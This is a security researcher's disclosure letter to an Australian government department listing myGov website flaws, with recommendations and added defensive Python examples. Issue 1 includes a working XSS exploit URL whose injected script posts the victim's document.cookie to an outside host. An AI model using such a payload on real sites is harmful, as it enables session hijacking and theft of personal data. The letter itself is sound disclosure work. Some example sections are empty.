Australian Mygov Security Issues
nikcub@gmail.com
+61435177210
Friday 2nd of May 2014

To: Information Security Contact
Department of Human Services
Cc: Department of Finance
Office of the Australian Information Commissioner

Re: URGENT Security issues on myGov website
My name is Nik Cubrilovic and I am an independent security consultant and penetration tester. I am writing to you to report numerous security issues with the myGov website. The most serious of these security vulnerabilities would allow an attacker to hijack the account of any registered myGov user.

I found these issues after conducting a very basic security test of the website after reading the story by Ben Grubb about myGov in the Sydney Morning Herald on Monday, "Australians' private government details at the mercy of hackers, say IT security experts", published on the 28th of April 2014:
http://www.smh.com.au/itpro/governmentit/australiansprivategovernmentdetailsatmercyofhackerssayitsecurityexperts20140428zqzkg.html

Please see that the details of this report are routed to the right people who would be able to bring urgent attention to getting these issues fixed. I was unable to find a security contact on the myGov or department website.

Please find the details of each issue below; feel free to contact me on the email or phone number listed above.

Note that I have only tested the public interfaces of the myGov website, and have not carried out an exhaustive penetration test of the service. The issues found with only the public interface lead me to conclude that there are likely more similar issues with the service.

The most serious of these issues allows an attacker to hijack the account of any myGov user. I have successfully carried out this attack against my own myGov account using two computers.
Issue 1: Cross-Site Scripting Vulnerabilities in Enrolment Service

The URL at https://my.gov.au/EnrolService/enrolService.htm contains two cross-site scripting vulnerabilities. The URL query parameters _flowExecutionKey and _flowId are both not filtered; their values are passed into the output unaltered and unsanitised. This means that an attacker can inject JavaScript into either parameter and have it executed within the context of a user's myGov session. This can lead to capturing keystrokes or form data, or to hijacking a user's session by capturing their cookie.

Here is an example exploit URL (WARNING: This is a live attack):
https://my.gov.au/EnrolService/enrolService.htm?_flowId=enrolmentmgflow&_flowExecutionKey=e2s13f652%3cimg%20src%3da%20onerror%3d%22$.post('http://s03.do.nikcub.com/get.php',document.cookie)%22%3e24aae26396

This vulnerability can be executed in the background of another page, or in an IFRAME. The exploit works on all browsers and across all platforms.

Here is a screenshot of my browser executing my own JavaScript on the myGov website:
Recommendation: User input should be filtered and preferably whitelisted. Any output that is meant to be rendered on an HTML page should be escaped (HTML encoded character references). Examples:

Character   Escaped output
"           &quot;
<           &lt;
>           &gt;
&           &amp;
'           &#x27;
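To show the reflection and the fix side by side, here is an added example written for this report (it is not code from the myGov application; the form template and the whitelist grammar for the two parameters are assumptions). It decodes the exploit URL above, renders the parameters the way the vulnerable page does, and then renders them again with whitelisting and HTML escaping applied:

```python
"""Reflected XSS in _flowId / _flowExecutionKey: vulnerable rendering beside
the whitelisted + escaped form, driven by the exploit URL from the report.

Added example; the template and the token grammar are assumptions, not the
real enrolService.htm implementation."""
import html
import re
from urllib.parse import parse_qs, urlsplit

# The exploit URL quoted above (payload is URL-encoded).
EXPLOIT_URL = (
    "https://my.gov.au/EnrolService/enrolService.htm?_flowId=enrolmentmgflow"
    "&_flowExecutionKey=e2s13f652%3cimg%20src%3da%20onerror%3d%22$.post("
    "'http://s03.do.nikcub.com/get.php',document.cookie)%22%3e24aae26396"
)

# Assumed grammar for a flow id / execution key: short, alphanumeric, no markup.
TOKEN = r"[A-Za-z0-9_-]{1,64}"


def query_params(url):
    """First value of each query parameter, URL-decoded."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def page(flow_id, key):
    """Hypothetical template: both parameters end up inside attribute values."""
    return ('<form action="enrolService.htm">'
            '<input type="hidden" name="_flowId" value="' + flow_id + '">'
            '<input type="hidden" name="_flowExecutionKey" value="' + key + '">'
            '</form>')


def render_vulnerable(params):
    """Reflects both parameters verbatim, as the report describes."""
    return page(params.get("_flowId", ""), params.get("_flowExecutionKey", ""))


def render_fixed(params, whitelist=True):
    """Rejects (does not 'clean') values outside the whitelist, then escapes
    on output. html.escape(quote=True) covers the five characters in the
    table above: & < > " and '."""
    out = []
    for name in ("_flowId", "_flowExecutionKey"):
        value = params.get(name, "")
        if whitelist and not re.fullmatch(TOKEN, value):
            value = ""
        out.append(html.escape(value, quote=True))
    return page(*out)


def injected_tags(rendered):
    """Tag names present that the template itself never emits."""
    return [t for t in re.findall(r"<(\w+)", rendered) if t not in ("form", "input")]


if __name__ == "__main__":
    p = query_params(EXPLOIT_URL)
    print("decoded key :", p["_flowExecutionKey"])
    print("vulnerable  :", injected_tags(render_vulnerable(p)))
    print("fixed       :", injected_tags(render_fixed(p)))
```

The whitelist is the primary control (a flow key never legitimately contains `<` or a space); the escaping is the safety net for any path that renders the value anyway, and on its own it also neutralises the payload.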
Issue 2: Server errors on unexpected input

A server crashing on unexpected input is indicative of improper input handling, which often leads to SQL injection and cross-site scripting attacks (as seen in Issue 1).

The number of pages and parameters that crash on improper input is too long to list here, but some examples are:

Recommendation: User input should be thoroughly filtered, sanitised and then validated. Improper input handling is the cause of the most common security issues with web applications, and often leads to bugs that are both easy to discover and easy to exploit.
Issue 3: SQL injection in the login service

In the /LoginServices/Authenticate.do URL any parameter name is injectable. This is identified by looking at the different responses to two SQL queries: one which returns true and another which returns false. Examples:

There are other URLs that also give out either server errors or varying responses to different true/false SQL combinations, which is indicative of an SQL injection.

Recommendation: As with the above examples, this is a result of insufficient input filtering. All user input should be filtered, sanitised and then validated. Database queries should also be built with parameterised statements rather than by concatenating user-supplied strings into the query text, so that a value which slips past the filter still cannot change the query's structure.
Issue 4: Sessions are incorrectly expired

The myGov website sets numerous cookies in the user's browser for session management. The primary cookie used to authenticate the user is set as a session-based cookie, which means the cookie remains valid as long as the user has not restarted their browser.

Instead of using the cookie standard to expire the session, the myGov application runs a JavaScript function that checks the user's inactivity time and then expires the cookie using JavaScript. This is not the correct way to implement short-lived user sessions, nor is it the industry accepted method for implementing short-lived sessions with a set expiry time (in this case 15 minutes).

The reason why this method of session expiration is unsafe is that an attacker using a technique such as the cross-site scripting vulnerability described in Issue 1 is able to alter the JavaScript and prevent the execution of the expiry routine.

JavaScript also has no reliable method of expiring cookies, and there are many ways in which the expiration can be blocked or prevented from running (ad-blocking software, the JavaScript source not being loaded completely and thus not executing, etc.).

Recommendation: Implement the session by setting a proper expiry date on the cookie which is 15 minutes in the future. The cookie will then be expired using the standard mechanism built into the browser, rather than a custom technique implemented in JavaScript. The same 15-minute idle limit must also be enforced on the server by invalidating the session record, because a cookie expiry only instructs a well-behaved browser and does nothing against an attacker who has already captured the session token.
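As an added illustration of that recommendation (written for this report, not code from the myGov application; the cookie name and the in-memory store are assumptions), the following keeps the idle timeout on the server and issues a cookie whose Max-Age/Expires matches it:

```python
"""Server-enforced 15-minute idle timeout with a matching cookie expiry.

Added example; MYGOV_SESSION and the dict-backed store are assumptions for
illustration, not the real myGov session implementation."""
import secrets
from datetime import datetime, timedelta, timezone

IDLE_TIMEOUT = timedelta(minutes=15)
COOKIE_NAME = "MYGOV_SESSION"   # assumed name


class SessionStore:
    def __init__(self):
        self._sessions = {}   # token -> {"user": str, "last_seen": datetime}

    def create(self, user, now):
        token = secrets.token_urlsafe(32)   # 256 bits, unguessable
        self._sessions[token] = {"user": user, "last_seen": now}
        return token

    def lookup(self, token, now):
        """Return the user for a live session and slide its window, else None.
        The decision is made here, not by the client's clock or JavaScript."""
        sess = self._sessions.get(token)
        if sess is None:
            return None
        if now - sess["last_seen"] > IDLE_TIMEOUT:
            del self._sessions[token]   # idle too long: dead even if the cookie is presented
            return None
        sess["last_seen"] = now
        return sess["user"]

    def destroy(self, token):
        self._sessions.pop(token, None)


def set_cookie_header(token, now):
    """Set-Cookie value telling the browser to drop the cookie at the same
    moment the server stops honouring it (Issues 5 and 7 flags included)."""
    expires = (now + IDLE_TIMEOUT).astimezone(timezone.utc).strftime("%a, %d %b %Y %H:%M:%S GMT")
    return (f"{COOKIE_NAME}={token}; Max-Age={int(IDLE_TIMEOUT.total_seconds())}; "
            f"Expires={expires}; Path=/; Secure; HttpOnly")


if __name__ == "__main__":
    store = SessionStore()
    now = datetime.now(timezone.utc)
    tok = store.create("demo-user", now)
    print(set_cookie_header(tok, now))
    print(store.lookup(tok, now + timedelta(minutes=14)))   # demo-user
    print(store.lookup(tok, now + timedelta(minutes=30)))   # None (16 min idle)
```

Because the server-side window slides on each request, the response to every authenticated request should re-send the Set-Cookie header so the browser's expiry slides with it; a client that tampers with its own cookie gains nothing, since lookup() is what decides.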
Issue 5: Cookies do not set the secure flag

The cookies set by the myGov website do not set the secure flag, which means the browser will also send them over an unencrypted HTTP connection to the same host. The most common application of such a vulnerability would be with users connected via public wifi, where an attacker on the same network could masquerade as the router, intercept all traffic and act as a proxy capturing sensitive data.

Recommendation: Set the secure flag on cookies.
Issue 6: No strict transport security set

Related to the secure cookies issue, the myGov website does not force the browser to use an SSL connection using the HTTP Strict Transport Security standard. This allows an attacker acting in a proxy capacity (a man-in-the-middle attack) to strip SSL.

Modern browsers support the HTTP Strict Transport Security standard: once the header has been received over a valid HTTPS connection, the browser will refuse to connect to that website over plain HTTP for the lifetime of the policy (rewriting any http:// reference to https:// before the request is sent), and will treat any certificate error on that site as fatal rather than offering the user a click-through warning.

Recommendation: Set the Strict-Transport-Security header in all web server responses, with a max-age of months rather than minutes. Note that the header is only honoured when received over HTTPS, and the very first visit remains unprotected unless the site is in the browser's preload list. For further details see the RFC for the HSTS standard, number 6797, at http://tools.ietf.org/html/rfc6797
Issue 7: Cookies do not set the HttpOnly flag and can be read in JavaScript

The cookies set by the myGov website do not set the HttpOnly flag, which means an exploit such as that described in Issue 1 is able to read and hijack the user's session.

Recommendation: Set the HttpOnly flag on each cookie. Cookies on a secure web application should not be able to be read by JavaScript. Note that HttpOnly only stops the cookie being read via document.cookie; injected script can still make requests that carry the cookie, so this is a mitigation for Issue 1, not a fix for it.
Issue 8: Password authentication is susceptible to brute-force attacks

The login method on myGov does not contain a CAPTCHA, used to distinguish between human authentication attempts and attempts from a bot. The login method also does not throttle requests from a user. The combination of these two issues means that a program can be written to brute-force user passwords.

Recommendation: Implement a CAPTCHA. Implement throttling on user authentication via an application-level firewall, or implement a side channel for authentication (see Issue 10).
Issue 9: No brute-force or robot protection on account linking

When a myGov user links an account, it requires information such as a user's first name, surname, address and date of birth. The server responses indicate to the user which field is not matched and whether the link details (such as a Medicare number) are valid.

An attacker is able to brute-force these details using a bot as there is no human check (CAPTCHA) or throttling of requests.

Recommendation: As per password authentication, implement a CAPTCHA and application-level request throttling on account linking. The response should also stop revealing which individual field failed to match, since that oracle lets an attacker guess one field at a time instead of all of them together.
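As an added example of the throttling recommended for Issues 8 and 9 (written for this report, not code from the myGov application; the limits are assumptions), here is a failure-counting throttle keyed both by the targeted account or identity and by the requesting IP, with a lockout that doubles on each repeat and a single generic error message:

```python
"""Throttle for login (Issue 8) and account-linking (Issue 9) attempts:
per-account and per-IP failure windows, exponential lockout, generic error.

Added example; the thresholds are assumptions for illustration."""
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone


class FailureThrottle:
    def __init__(self, max_failures=5, window=timedelta(minutes=15),
                 base_lockout=timedelta(minutes=1), max_lockout=timedelta(hours=1)):
        self.max_failures = max_failures
        self.window = window
        self.base_lockout = base_lockout
        self.max_lockout = max_lockout
        self._failures = defaultdict(deque)   # key -> timestamps of recent failures
        self._locked_until = {}               # key -> datetime
        self._strikes = defaultdict(int)      # key -> lockouts so far (drives backoff)

    def _prune(self, key, now):
        q = self._failures[key]
        while q and now - q[0] > self.window:
            q.popleft()

    def allowed(self, key, now):
        until = self._locked_until.get(key)
        return until is None or now >= until

    def record_failure(self, key, now):
        self._prune(key, now)
        self._failures[key].append(now)
        if len(self._failures[key]) >= self.max_failures:
            self._strikes[key] += 1
            lock = min(self.base_lockout * 2 ** (self._strikes[key] - 1), self.max_lockout)
            self._locked_until[key] = now + lock
            self._failures[key].clear()

    def record_success(self, key):
        self._failures.pop(key, None)
        self._locked_until.pop(key, None)
        self._strikes.pop(key, None)


GENERIC_ERROR = "The details supplied could not be verified."


def attempt(throttle, account_key, ip_key, now, check):
    """Gate one login or link attempt. `check()` returns True when the
    password or the supplied identity details match. Both keys must be open;
    a failure counts against both; the caller only ever sees one generic
    message, never which field was wrong."""
    if not (throttle.allowed(account_key, now) and throttle.allowed(ip_key, now)):
        return False, GENERIC_ERROR
    if check():
        throttle.record_success(account_key)   # the IP keeps its history
        return True, None
    throttle.record_failure(account_key, now)
    throttle.record_failure(ip_key, now)
    return False, GENERIC_ERROR


if __name__ == "__main__":
    th = FailureThrottle()
    now = datetime.now(timezone.utc)
    for i in range(6):
        print(attempt(th, "user:alice", "ip:203.0.113.5", now + timedelta(seconds=i),
                      lambda: False))
```

Keying on the account stops an online attack on one victim from any number of addresses; keying on the IP stops one address from spraying guesses across many accounts. A CAPTCHA would be demanded at the same point the lockout is applied, which is the one place in the flow where the server already knows the attempt is abusive.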
Issue 10: No side-channel authentication of user accounts

Related to the previous issue is the lack of a side-channel method of user authentication. The authentication tokens used on registration of myGov accounts are a user's name, surname, date of birth and, for example, a Medicare number. None of these parameters are secrets.

This leaves authentication susceptible to attacks in which an attacker obtains these "secrets" using methods such as social engineering or spear phishing.

Recommendation: Implement a side channel for user authentication. An example would be sending a unique code to a verified mobile phone number, or to a verified mailing address for the user. This unique token would serve as proof of identity in the authentication and authorisation routine.
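The server side of such a side channel, as an added example (written for this report, not code from the myGov application; the code length, lifetime, attempt cap and message wording are assumptions): a random one-time code is sent through the out-of-band gateway, only its HMAC is stored, and verification is time-limited, attempt-limited and single-use.

```python
"""One-time code delivered over a side channel (SMS or post) and verified
server-side: random, stored only as an HMAC, short-lived, few attempts, single use.

Added example; CODE_DIGITS, CODE_LIFETIME and MAX_ATTEMPTS are assumptions."""
import hashlib
import hmac
import secrets
from datetime import datetime, timedelta, timezone

CODE_DIGITS = 8
CODE_LIFETIME = timedelta(minutes=10)
MAX_ATTEMPTS = 3


class SideChannelVerifier:
    def __init__(self, server_key, send):
        self._key = server_key    # secret held only by the server
        self._send = send         # callable(destination, message): the SMS/mail gateway
        self._pending = {}        # user -> {"mac", "expires", "attempts"}

    def _mac(self, user, code):
        return hmac.new(self._key, f"{user}:{code}".encode(), hashlib.sha256).digest()

    def issue(self, user, destination, now):
        """Generate and dispatch a code; the plaintext leaves only via the side
        channel, so a database read cannot recover it. Returns the expiry."""
        code = f"{secrets.randbelow(10 ** CODE_DIGITS):0{CODE_DIGITS}d}"
        self._pending[user] = {"mac": self._mac(user, code),
                               "expires": now + CODE_LIFETIME, "attempts": 0}
        self._send(destination, f"Your myGov verification code is {code}")
        return self._pending[user]["expires"]

    def verify(self, user, code, now):
        rec = self._pending.get(user)
        if rec is None or now > rec["expires"]:
            self._pending.pop(user, None)
            return False
        rec["attempts"] += 1
        ok = hmac.compare_digest(rec["mac"], self._mac(user, code))
        if ok or rec["attempts"] >= MAX_ATTEMPTS:
            del self._pending[user]   # single use, or burned after too many guesses
        return ok


if __name__ == "__main__":
    outbox = []
    v = SideChannelVerifier(b"replace-with-a-real-server-key",
                            lambda dest, msg: outbox.append((dest, msg)))
    now = datetime.now(timezone.utc)
    v.issue("alice", "+61400000000", now)
    sent_code = outbox[-1][1].split()[-1]
    print(v.verify("alice", "00000000", now), v.verify("alice", sent_code, now))
```

The attempt cap matters as much as the randomness: an 8-digit code with unlimited guesses is brute-forceable in the same way as the login form in Issue 8, and it must be rate-limited in the same way.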
Issue 11: Frameable response (clickjacking)

A web page controlled by an attacker is able to load the content of the myGov web application within an iframe on another page. This enables a "clickjacking" attack, in which the attacker's page overlays the target application's interface with a different interface provided by the attacker and captures the user's clicks or login information.

A frameable web application also means that as part of a cross-site scripting attack (see Issue 1) the attacker does not have to send the victim a direct URL to myGov, but may instead load the exploit URL in the background of another page (such as a forum, website or on an ad network).

Recommendation: The server should set a suitable X-Frame-Options header (eg. SAMEORIGIN, which would prevent the page being framed on another site). This only closes the iframe route; the exploit URL from Issue 1 can still be opened in a pop-up or via a redirect, so the header complements fixing Issue 1 rather than replacing it.

The X-Frame-Options header is described in RFC 7034 and is supported by all major browsers. The RFC can be found at http://tools.ietf.org/html/rfc7034
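Issues 5, 6, 7 and 11 are all visible in a single response, so here is an added checker (written for this report, not code from the myGov application) that parses a raw HTTPS response head and reports missing Secure and HttpOnly flags, a missing or short-lived Strict-Transport-Security header, and a missing X-Frame-Options header. The two sample responses are constructed for the example, not real captures, and the cookie names in them are made up:

```python
"""Audit a raw HTTPS response for the cookie flags and headers from
Issues 5 (Secure), 6 (HSTS), 7 (HttpOnly) and 11 (X-Frame-Options).

Added example; the sample responses are constructed, not real myGov captures."""
import re


def parse_headers(raw):
    """Split a raw HTTP response head into (status_line, [(name, value), ...]),
    with header names lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def audit(raw, min_hsts_age=15552000):   # 180 days; assumed policy floor
    """Return a list of findings; an empty list means all four checks pass."""
    _, headers = parse_headers(raw)
    findings = []
    for name, value in headers:
        if name != "set-cookie":
            continue
        parts = value.split(";")
        cookie = parts[0].split("=", 1)[0].strip()
        attrs = {a.strip().lower() for a in parts[1:]}
        if "secure" not in attrs:
            findings.append(f"cookie {cookie} lacks Secure (Issue 5)")
        if "httponly" not in attrs:
            findings.append(f"cookie {cookie} lacks HttpOnly (Issue 7)")
    hsts = [v for n, v in headers if n == "strict-transport-security"]
    if not hsts:
        findings.append("no Strict-Transport-Security header (Issue 6)")
    else:
        m = re.search(r"max-age=(\d+)", hsts[0], re.I)
        if not m or int(m.group(1)) < min_hsts_age:
            findings.append(f"Strict-Transport-Security max-age too short: {hsts[0]!r} (Issue 6)")
    xfo = [v for n, v in headers if n == "x-frame-options"]
    if not xfo or xfo[0].strip().upper() not in ("DENY", "SAMEORIGIN"):
        findings.append("no X-Frame-Options DENY/SAMEORIGIN header (Issue 11)")
    return findings


# Constructed to resemble the report's findings (cookie names are invented).
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Set-Cookie: SESSION=0123456789ABCDEF; Path=/\r\n"
    "Set-Cookie: activity=1399000000; Path=/\r\n"
    "\r\n"
    "<html>...</html>"
)

# The same response after applying the recommendations of Issues 5, 6, 7 and 11.
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Set-Cookie: SESSION=0123456789ABCDEF; Path=/; Secure; HttpOnly\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "X-Frame-Options: SAMEORIGIN\r\n"
    "\r\n"
    "<html>...</html>"
)

if __name__ == "__main__":
    for label, resp in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit(resp) or "OK")
```

Run against a captured response from each myGov endpoint (a copy saved from a browser's network panel or a proxy is enough), the checker gives a per-URL list that can be re-run after each fix to confirm it has actually shipped.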
Issue 12: No security point of contact

Upon discovery of these issues I attempted to track down a security point of contact. The myGov website does not publish a contact address, PGP key (for secure communication) or details of a disclosure policy.

Recommendation: Add a detailed section to the security page of the myGov website where users and security researchers can report security issues. Include a contact email address, phone number, PGP key and details of the disclosure policy for the website.
Responsible Disclosure

It is my intention to make these issues public at some point in the future. As myGov has no published responsible disclosure policy, we can apply the industry standard 7-day disclosure timeline.

See Google's disclosure policy as an example:
http://googleonlinesecurity.blogspot.com.au/2013/05/disclosuretimelineforvulnerabilities.html

I would consider the cross-site scripting vulnerability to be a critical issue that requires urgent attention.

If the department requires longer than 7 days to fix this issue, please let me know. I would also ask that the department confirm receipt of these issues and provide any response as soon as possible.

My primary concern is the security of users of the myGov service. I think there is a high probability that the cross-site scripting vulnerability, or some combination of the other issues, has been exploited in the wild.

Good security practice and policy thrives in an environment of transparency and disclosure, hence my intention to detail the issues found on the myGov website on my blog once they have been fixed.